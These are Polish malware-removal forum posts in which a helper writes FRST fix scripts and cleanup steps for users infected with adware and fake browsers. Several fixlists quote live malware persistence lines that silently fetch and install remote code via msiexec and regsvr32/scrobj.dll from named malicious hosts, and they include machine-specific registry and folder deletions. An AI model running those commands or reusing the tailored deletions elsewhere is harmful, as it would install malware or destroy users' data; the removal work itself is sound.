Miszel03

Wszystkie zagrożenia wykryte przez MBAM daj do kasacji. Proszę znowu o podsumowanie obecnego stan systemu.

Wszystkie detekcja daj do usuwania. Następnie zmień hasła we wszystkich serwisach logowania, a szczególnie w banku. Martwą mnie te detekcje: Trojan.WisdomEyes / Trojan.Downloader.D.Generic, ale zakładam, że MBAM usunął je pomyślnie. Kończymy, ale proszę na bieżąco obserwować system. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Uaktualni również bazy oprogramowania zabezpieczającego i wykonaj nim pełne skanowanie systemu (raczej już nic nie powinno być wykryte).

W systemie jw. pisałem wymagane są korekty dot. kasacji elementów adware. Powiedz mi jeszcze co wiesz na temat AdBlockera. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = S0 2AFF4D74; system32\drivers\2AFF4D74.sys [X] S3 4586240C82A85194; \??\c:\documents and settings\tomek\ustawienia lokalne\temp\7B654D13-A57C2DCF-CAB68671-2762F73C\32ee17184.sys [X] S3 4F96390CC2AC6708; \??\C:\DOCUME~1\ADMINI~1.TOM\USTAWI~1\Temp\4D170C275.sys [X] S3 4F96391A73EB5308; \??\C:\DOCUME~1\ADMINI~1.TOM\USTAWI~1\Temp\2AD2134A.sys [X] S3 catchme; \??\C:\DOCUME~1\Tomek\USTAWI~1\Temp\catchme.sys [X] S4 IObitUnlocker; \??\C:\Program Files\IObit\IObit Unlocker\IObitUnlocker.sys [X] S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] U3 TlntSvr; Brak ImagePath S3 UIUSys; system32\drivers\UIUSys.sys [X] 2016-06-29 10:14 - 2016-06-29 10:14 - 0128512 _____ () C:\Documents and Settings\Tomek\Dane aplikacji\Installer.dat 2016-06-29 10:15 - 2016-06-29 10:15 - 0018432 _____ () C:\Documents and Settings\Tomek\Dane aplikacji\Main.dat Task: C:\WINDOWS\Tasks\PPTAssistantNotifyTask_Tomek.job => C:\Documents and Settings\Tomek\Ustawienia lokalne\Dane aplikacji\PPTAssist\notify.exe Task: C:\WINDOWS\Tasks\PPTAssistantUpdateTask_Tomek.job => C:\Documents and Settings\Tomek\Ustawienia lokalne\Dane aplikacji\PPTAssist\assistupdate.exe Task: C:\WINDOWS\Tasks\{E5F8EBDB-032D-D6F5-7BF3-7781FD235F2D}.job => C:\WINDOWS\system32\regsvr32.exe E /s /n /i:/rt C:\DOCUME~1\ALLUSE~1\DANEAP~1\3dd92577\ea5350a.dll EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Nie musisz dostarczać nowych logów, poproszę tylko o plik Fixlog - sprawdzimy tylko czy wszystko się wykonało. Komentując zaś raport z TDSSKiller powiem, że jest czysty. Nic podejrzanego.

Przejdź do następnych punktów.

Zapuść proszę taki skrypt do FRST. DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox Reboot: Dostarcz tylko plik Fixlog, by sprawdzić wykonanie. Zapis i wykonanie skryptu tak jak poprzednio.

Wszystko pomyślnie wykonane. Do kasacji zostały szczątkowe klucze od fałszywych przeglądarek. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 1. Start narzędzia komend. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. 2. Użycie odpowiednich komend.W oknie konsoli komend wklej poniższą komendę. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye" /f reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Doeye" /f reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox" /f reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Firefox" /f Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system. 3. Skasuj ręcznie ten plik przez SHIFT + Delete (omijanie kosza) C:\Users\monic\AppData\Roaming\Mozilla. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Podsumuj obecny stan systemu.

Jeśli wszystko wykonana, a Avast już się uspokoił to kończymy. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Do kasacji szczątkowe klucze od fałszywej przeglądarki. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 1. Start narzędzia komend. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. 2. Użycie odpowiednich komend. W oknie konsoli komend wklej poniższą komendę. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Boxbob" /f reg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Boxbob" /f reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefox" /freg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Firefox" /f Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Podsumuj obecny stan systemu.

Nic się nie wykonało, przetwórz skrypt jeszcze raz, ale tym razem taki (ucięte problematyczne wejście). CloseProcesses: HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q IFEO\taskmgr.exe: [Debugger] SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye RemoveDirectory: C:\Users\monic\AppData\Local\Doeye R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox RemoveDirectory: C:\Users\monic\AppData\Local\Firefox RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe C:\Users\monic\Desktop\GIMP 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk EmptyTemp:

Samoinstalująca się przeglądarka FireFox to fałszywka przeglądarki Mozilla FireFox. Do tego przeglądarka Google Chrome również została sfałszowana (ale poprzez dodanie niepoprawnej ścieżki do uruchamiania złej wersji, poprawna występuje również). Przechodzimy do akcji. Do poczytania, obowiązkowo: KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q IFEO\taskmgr.exe: [Debugger] SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye RemoveDirectory: C:\Users\monic\AppData\Local\Doeye R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox RemoveDirectory: C:\Users\monic\AppData\Local\Firefox RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe C:\Users\monic\Desktop\GIMP 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). doeye;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Tak, to rozumiem, ale nie możecie nastawiać się na to, że taki program będzie w stanie chronić w nieskończoność i ja bym nastawiał się na coś innego.

Kasują dwie szczątkowe usługi po Avast, odwołania do nieistniejących plików, polityka explorer. Tworzą punkt przywracania oraz czyszczą wszytki pliki tymczasowe. By synchronizacja nie przywróciła ewentualnych złych ustawień z serwera (odłączenie = reset). Jeśli kolizyjne to dla Ciebie to omiń. Pliki tymczasowe - to tam Avast głównie krzyczy, a to wyczyści to Fix. To kroki złączone, czyszczące FireFoxa, tak, aby Avast nie widział już niczego złego / tymczasowego. Najlepiej by było wyczyścić. Tak, rozszerzenia, dane przeglądarki etc. Osobno, uBlock jest lepszy.

Literówka to zwykły błąd w tłumaczeniu za pewne, do końca tygodnia skontaktuje się z obsługą firmy Avast i zgłoszę błąd. To, że Avast blokuje GMER'a to nic dziwnego. FRST oraz GMER to narzędzia diagnostyczne, mają dostęp do grubych warstw systemu, skanują wszystko i pokazują to w formie raportu. Ja oceniam cały system i ewentualnie go leczę. Zresztą...z tego co mi się wydaję w instrukcjach naszego forum piszemy o wyłączeniu oprogramowania antywirusowego na czas tworzenia raportów. Nie A z GMER'em są ostatnio jakieś jaja, muszę porozmawiać na ten temat z picasso. PUP - Potentially Unwanted Program - potencjalnie niepożądany program. To jakiś śmieć wyświetlający reklamy, nic poważnego. Mam nadzieję, że trochę Ci od strachu odwiodłem. P.S: Link do Chomikuj z tym plikiem zamazałem do stanu nieklikalnego, dodałem do posta również notatkę moderacyjną. Zasady działu mówią jasno: podejrzane linki maskować, ukrywać, a najlepiej do moderatora na PW. Komentując system to nie widzę aktywnej infekcji. Czyścimy Mozilla FireFox oraz wszystkie pliki tymczasowe, po tym poobserwujesz. System dodatkowo możesz przeskanować całościowo za pomocą programu Malwarebytes, który masz na dysku, a również Avastem. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2949551511-373755211-1111318044-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\BM\AppData\Roaming\Dropbox\bin\DropboxExt.28.dll -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\BM\AppData\Roaming\Dropbox\bin\DropboxExt.28.dll -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\BM\AppData\Roaming\Dropbox\bin\DropboxExt.28.dll -> Brak pliku S3 AvastVBoxSvc; "C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe" [X] S2 VBoxAswDrv; \??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [X] EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Nie musisz dostarczać nowych logów, ani raportu wynikowego (pliku Fixlog).

Widzę, już komplet raportów. Odpowiem w temacie w najbliższym czasie, niestety ale znowu mam urwanie głowy.

Tcpip\..\Interfaces\{30451EB0-9498-420F-B3B9-EEC5E4B6E782}: [DhcpNameServer] 208.67.222.222 8.8.8.8 Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 8.8.8.8 DNS Servers: 208.67.222.222 - 8.8.8.8 Na routerze jest jeszcze jeden szkodliwy adres, którego nie usunąłeś - usuń go. Reszta pomyślnie wykonana, zakończymy sprawę z routerem, będą poprawki i kończymy.

Ludzie...napisałem instrukcję pod całkowicie nieaktualny obraz systemu. W instrukcjach wyraźnie piszemy, że po generacji raportów na komputerze już nic inwazyjnego nie robimy. Zrób nowe raport FRST oraz GMER, dostarcz też raport z MBAM.

AdwCleaner oraz Malwarebytes nie usunęły praktycznie żadnej infekcji*. Advanced System Care to twór IObit, czyli firmy o szemranej przeszłości. Programy, którymi się posługiwałeś to rodzina produktów, usuwają produkty IOBit jak leci, ale nie ma się co im dziwić, bo IObit był oskarżony o kradzież baz MBAM. IObit ma również powiązania z reklamami i kontrowersyjnymi typami. * - o tym tworze jednak nie można powiedzieć: "infekcja". Jeśli zaś chodzi o sam system i infekcję to nie widać niczego konkretnego. Sprzątam po starych infekcjach adware, które niestety tu były. P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego (same zabezpieczenia systemu Windows 7 nie są wystarczające). Przejrzyj: KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-555716706-582034064-2806578146-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia S3 cpuz138; \??\C:\Users\Admin\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetWorx\NetWorx on the Web.lnk C:\Users\Admin\Desktop\WSZYSTKO\Advanced SystemCare 10.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Admin\AppData\Local\Mozilla C:\Users\Admin\AppData\Roaming\Mozilla C:\Users\Admin\AppData\Roaming\Profiles DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Nie musisz dostarczać nowych raportów, dostarcz tylko plik Fixlog.

System jest zainfekowany tą wyjątkową sławną infekcją w ostatnim czasie, oprócz tego dochodzi jeszcze wątpliwy skaner, fałszywa przeglądarka podszywająca się pod Google Chrome i ogólny nieład. 1. Przez panel sterowania odinstaluj: Wątpliwe skanery / oprogramowanie: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== /q CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?publisher=OC&dpid=OC&co=PL&userid=fcbbdada-8d0f-4e30-81d6-78bc5b3f5fb7&affid=113129&searchtype=hp&babsrc=lnkry","hxxp://www.interia.pl/#utm_source=instalki1&utm_medium=installer&utm_campaign=instalki1&iwa_source=installer_instalki","hxxp://www.omniboxes.com/?type=hp&ts=1453675607&z=ba7d726f9838c2429ec3b41gaz6w9cfq2m5wbq7efm&from=amt&uid=wdcxwd10jpcx-24ue4t0_wd-wxm1e83vhj92vhj92" HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Boxbob RemoveDirectory: C:\Users\Arczi\AppData\Local\Boxbob R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Arczi\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Arczi\AppData\Local\Firefox R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [brak podpisu cyfrowego] U3 kxldrpob; \??\C:\Users\Arczi\AppData\Local\Temp\kxldrpob.sys [X] HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) Task: {39AB3992-685C-4C43-BF2B-267874318720} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== scrobj.dll Task: {BCA1E17D-E930-47CC-A8D9-AF0F275A907B} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{28F4CBD1-61EB-4D72-B858-FD0972534239}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe FirewallRules: [{C5F00FDE-B5CF-49D8-8B76-81C27025C315}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{F6C7D29A-DFC8-45CD-8919-1056F46D94F2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Arczi\AppData\Local\Mozilla C:\Users\Arczi\AppData\Roaming\Mozilla C:\Users\Arczi\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 4. Pomimo wszczęsniejszych akcji z AdwaCleaner: pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). boxbob;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

No cóż...jest infekcja faktycznie identyczna jak w tamtym temacie, ale na przyszłość: nie podoba mi się kopiowanie opisów tematów. To niszczy strukturę forum, każdy przypadek jest indywidualny i wole mieć opis również indywidualny. 1. Spróbuj uruchomić ten plik deinstalacyjny adware: C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-531191069-2322497366-2288422930-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 /q SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-531191069-2322497366-2288422930-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - iexplore.exe S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X] U3 tmlwf; Brak ImagePath U3 tmwfp; Brak ImagePath U3 ffrdipoc; \??\C:\Users\Stacle\AppData\Local\Temp\ffrdipoc.sys [X] Task: {020A73A9-C13C-452A-8BCB-B4CBEEBEFA6E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 scrobj.dll Task: {151927A4-4E65-4502-AE5F-F7A382ADB41B} - System32\Tasks\{0C959900-9599-4038-AF97-C4598B646275} => pcalua.exe -a C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe -c -ptid=w3i C:\Users\Stacle\AppData\Roaming\webssearches EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Zrób raport z aswMBR. Z opcji Scan, jeśli coś wykryje to niczego nie usuwaj, - dostarcz tylko raport (skopiuj wynik z konsoli).

